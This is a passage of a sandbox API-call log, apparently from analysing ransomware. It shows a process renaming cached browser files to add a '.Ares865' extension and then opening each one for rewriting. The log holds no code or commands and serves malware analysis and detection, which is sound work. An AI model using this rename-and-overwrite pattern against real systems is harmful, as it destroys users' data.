dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2328) returned 1 [0095.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png.Ares865") returned 116 [0095.056] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png.ares865"), dwFlags=0x1) returned 1 [0095.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.058] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=930) returned 1 [0095.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png.Ares865") returned 117 [0095.061] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png.ares865"), dwFlags=0x1) returned 1 [0095.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=588) returned 1 [0095.065] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png.Ares865") returned 117 [0095.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png.ares865"), dwFlags=0x1) returned 1 [0095.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.067] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=920) returned 1 [0095.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png.Ares865") returned 117 [0095.069] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png.ares865"), dwFlags=0x1) returned 1 [0095.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.071] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=560) returned 1 [0095.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png.Ares865") returned 117 [0095.074] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png.ares865"), dwFlags=0x1) returned 1 [0095.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.075] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=278) returned 1 [0095.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg.Ares865") returned 120 [0095.078] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.080] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=130479) returned 1 [0095.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1.Ares865") returned 122 [0095.089] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1.ares865"), dwFlags=0x1) returned 1 [0095.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=74370) returned 1 [0095.099] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js.Ares865") returned 118 [0095.100] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js.ares865"), dwFlags=0x1) returned 1 [0095.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.101] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33496) returned 1 [0095.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js.Ares865") returned 129 [0095.106] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js.ares865"), dwFlags=0x1) returned 1 [0095.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=245536) returned 1 [0095.122] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png.Ares865") returned 124 [0095.122] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png.ares865"), dwFlags=0x1) returned 1 [0095.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.124] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5666) returned 1 [0095.126] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png.Ares865") returned 120 [0095.126] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png.ares865"), dwFlags=0x1) returned 1 [0095.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.128] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=317) returned 1 [0095.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt.Ares865") returned 113 [0095.131] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt.ares865"), dwFlags=0x1) returned 1 [0095.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=158130) returned 1 [0095.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini.Ares865") returned 114 [0095.145] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0095.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0095.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js.Ares865") returned 122 [0095.152] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js.ares865"), dwFlags=0x1) returned 1 [0095.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=316857) returned 1 [0095.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg.Ares865") returned 118 [0095.174] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21060) returned 1 [0095.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865") returned 249 [0095.179] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].ares865"), dwFlags=0x1) returned 1 [0095.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4867) returned 1 [0095.184] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" [0095.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif.Ares865") returned 118 [0095.185] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif.ares865"), dwFlags=0x1) returned 1 [0095.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet 